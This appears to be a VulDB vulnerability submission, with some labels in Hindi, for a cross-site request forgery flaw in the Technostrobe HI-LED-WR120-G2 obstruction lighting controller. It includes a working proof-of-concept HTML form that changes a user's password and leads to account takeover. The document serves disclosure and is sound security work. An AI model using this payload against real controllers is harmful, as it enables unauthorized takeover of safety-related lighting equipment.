| शीर्षक | Technostrobe HI-LED-WR120-G2 Obstruction Lighting Controller 5.5.0.1R6.03.30 Cross-Site Request Forgery (CSRF) |
|---|
| विवरण | The application does not implement CSRF protection mechanisms for sensitive operations.
Vulnerable Endpoint:
POST /LoginCB HTTP/1.1
Host: <target>
Cookie: session=valid_session
user=user&password=useruser1!
Proof of Concept:
<form method="POST" action="http://technostrobe.shiky.demo:58746/LoginCB">
<input type="hidden" name="updatePassword" value="0">
<input type="hidden" name="userId" value="3">
<input type="hidden" name="newPassword" value="dXNlcnVzZXIxIQ=">
<input type="submit" value="Submit Request">
</form>
Root Cause:
No CSRF token validation
No origin/referrer validation
Server trusts browser-sent cookies
Impact:
Account takeover
Unauthorized configuration changes |
|---|
| स्रोत | ⚠️ https://github.com/shiky8/my--cve-vulnerability-research/blob/main/my_VulnDB_cves/CVE-TECHNOSTROBE-04-CSRF.md |
|---|
| उपयोगकर्ता | shiky8 (UID 96565) |
|---|
| सबमिशन | 20/03/2026 01:24 AM (29 दिन पहले) |
|---|
| संयम | 04/04/2026 04:41 PM (16 days later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 355342 [Technostrobe HI-LED-WR120-G2 5.5.0.1R6.03.30 क्रॉस साइट रिक्वेस्ट फॉर्जरी] |
|---|
| अंक | 20 |
|---|